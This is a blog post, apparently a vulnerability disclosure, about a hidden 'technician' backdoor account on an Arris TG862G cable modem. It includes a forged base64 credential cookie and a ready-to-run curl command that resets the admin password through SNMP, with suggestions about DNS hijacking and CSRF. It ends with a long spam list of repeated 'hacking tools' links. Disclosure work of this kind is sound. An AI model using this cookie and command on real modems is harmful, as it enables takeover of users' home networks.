Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -

Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.

Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):

Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9

 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:

{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

And after base64 decoding the "credential" value we get:

{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:

Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9

Which decodes to the following:

{"credential":"dGVjaG5pY2lhbjo="}

And finally:

{"credential":"technician:"} 

Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(

That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:

That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:

Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:

SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);

Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:

HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}

What about setting a new value? Surely that will not work....

That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:

This functionality can be wrapped up in the following curl command:

curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'

Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


Read more

1. What Are Hacking Tools
2. Hack Tools For Games
3. Pentest Tools Open Source
4. Pentest Tools For Ubuntu
5. Best Hacking Tools 2020
6. Hacking Tools 2020
7. Hacking Tools Online
8. Pentest Tools Port Scanner
9. Hacker Techniques Tools And Incident Handling
10. Hack Tools For Pc
11. What Are Hacking Tools
12. Hacking Tools Github
13. Hacking Tools Kit
14. Hacking Tools For Mac
15. Hacking Tools 2019
16. How To Make Hacking Tools
17. Pentest Tools Website
18. Hacking Tools Name
19. Pentest Tools Website
20. What Are Hacking Tools
21. Pentest Tools Tcp Port Scanner
22. Hacker Tools Hardware
23. Pentest Tools Website
24. Hacking Tools And Software
25. Game Hacking
26. Best Pentesting Tools 2018
27. Pentest Tools Subdomain
28. Hack Tool Apk
29. Hacking Tools And Software
30. Hack Tools 2019
31. Tools 4 Hack
32. Hackrf Tools
33. Hack Tools For Games
34. Hack Tool Apk No Root
35. Hacker
36. Hacker Hardware Tools
37. Hacker Search Tools
38. Hack Tool Apk
39. Pentest Tools Url Fuzzer
40. Hacking Tools Pc
41. Hacker Tools Software
42. Hacking Tools Name
43. Hacker Tools List
44. Hack Tools Pc
45. Hacking Tools For Windows
46. Hack Tools Pc
47. Hacking Tools For Beginners
48. Hack Tool Apk
49. Top Pentest Tools
50. Hacker Search Tools
51. Hack Tools Download
52. Hacker Tools Github
53. Termux Hacking Tools 2019
54. Pentest Tools Apk
55. Hack Rom Tools
56. Hacking Tools Kit
57. Hacker Tools For Pc
58. Easy Hack Tools
59. Best Pentesting Tools 2018
60. New Hack Tools
61. New Hack Tools
62. Pentest Tools Windows
63. Hacking Tools Pc
64. Hak5 Tools
65. Pentest Tools List
66. Tools 4 Hack
67. Install Pentest Tools Ubuntu
68. Blackhat Hacker Tools
69. Hacker Tools For Mac
70. Hacking Tools Software
71. Hacker Tools For Windows
72. Hack Tools Mac
73. Nsa Hack Tools Download
74. World No 1 Hacker Software
75. How To Hack
76. Hacker Tools Apk
77. Pentest Tools Subdomain
78. Hacking App
79. Hacking Tools 2020
80. Hack Apps
81. Pentest Tools Review
82. Hack Tools For Games
83. Hacking Tools Kit
84. Hackers Toolbox
85. Best Hacking Tools 2019
86. How To Hack
87. Pentest Tools Bluekeep
88. Hacking Tools Hardware
89. Hack Tools
90. Free Pentest Tools For Windows
91. Hacking Tools Windows
92. Pentest Tools Tcp Port Scanner
93. Hacker Techniques Tools And Incident Handling
94. Hacker Tools For Ios
95. Hacks And Tools
96. Hacking Tools For Beginners
97. Pentest Tools For Ubuntu
98. Hack Tools Download
99. Free Pentest Tools For Windows
100. Pentest Reporting Tools
101. Hack Rom Tools
102. Hacking Tools For Windows Free Download
103. Hacker Tools List
104. Black Hat Hacker Tools
105. Install Pentest Tools Ubuntu
106. Pentest Tools For Android
107. Pentest Tools Website Vulnerability
108. Physical Pentest Tools
109. Hacker Tools Linux
110. Game Hacking
111. Pentest Tools For Mac
112. Best Pentesting Tools 2018
113. Black Hat Hacker Tools
114. Hack Tools For Mac
115. Hacker Tools For Ios
116. Pentest Tools Download
117. Best Hacking Tools 2020
118. Hack Tools For Windows
119. Physical Pentest Tools
120. Hacker Tools Github
121. Nsa Hack Tools
122. Tools 4 Hack
123. Hacking Tools Github
124. Pentest Tools Linux
125. Hackrf Tools
126. Hack Tools For Pc
127. Pentest Tools Online
128. New Hack Tools
129. Pentest Tools Bluekeep
130. Hack Tools
131. Hacker Tools For Mac
132. Hacker Tools For Windows
133. Hack Tool Apk No Root
134. Hacker Tools 2020
135. Hacking Tools Online
136. Pentest Tools Bluekeep
137. Hack Tool Apk
138. Tools 4 Hack
139. Hacker Tools Online
140. Pentest Tools Online
141. Hacker Tools For Mac
142. Pentest Tools Linux
143. Pentest Tools List
144. Hacking Tools For Windows
145. Hacking Tools 2019
146. Pentest Tools Website Vulnerability
147. Pentest Tools Free
148. Pentest Tools Nmap
149. Tools 4 Hack
150. Game Hacking
151. Hacking Tools Pc
152. Hacking Tools For Windows 7
153. Pentest Recon Tools
154. Hacker Tools List
155. Pentest Tools Port Scanner
156. Hacking App
157. Hacking Tools For Pc
158. Hack Rom Tools
159. Hacker Security Tools
160. Hacker Tools Free
161. Hackrf Tools
162. Hack Tools
163. Pentest Tools
164. Pentest Tools Alternative
165. Pentest Tools For Ubuntu
166. Hacking Tools Hardware
167. Hack Tools For Games
168. Usb Pentest Tools
169. Hacker Tools 2019
170. Tools For Hacker
171. Pentest Tools Free
172. Hacker Hardware Tools
173. Hacking Tools Windows 10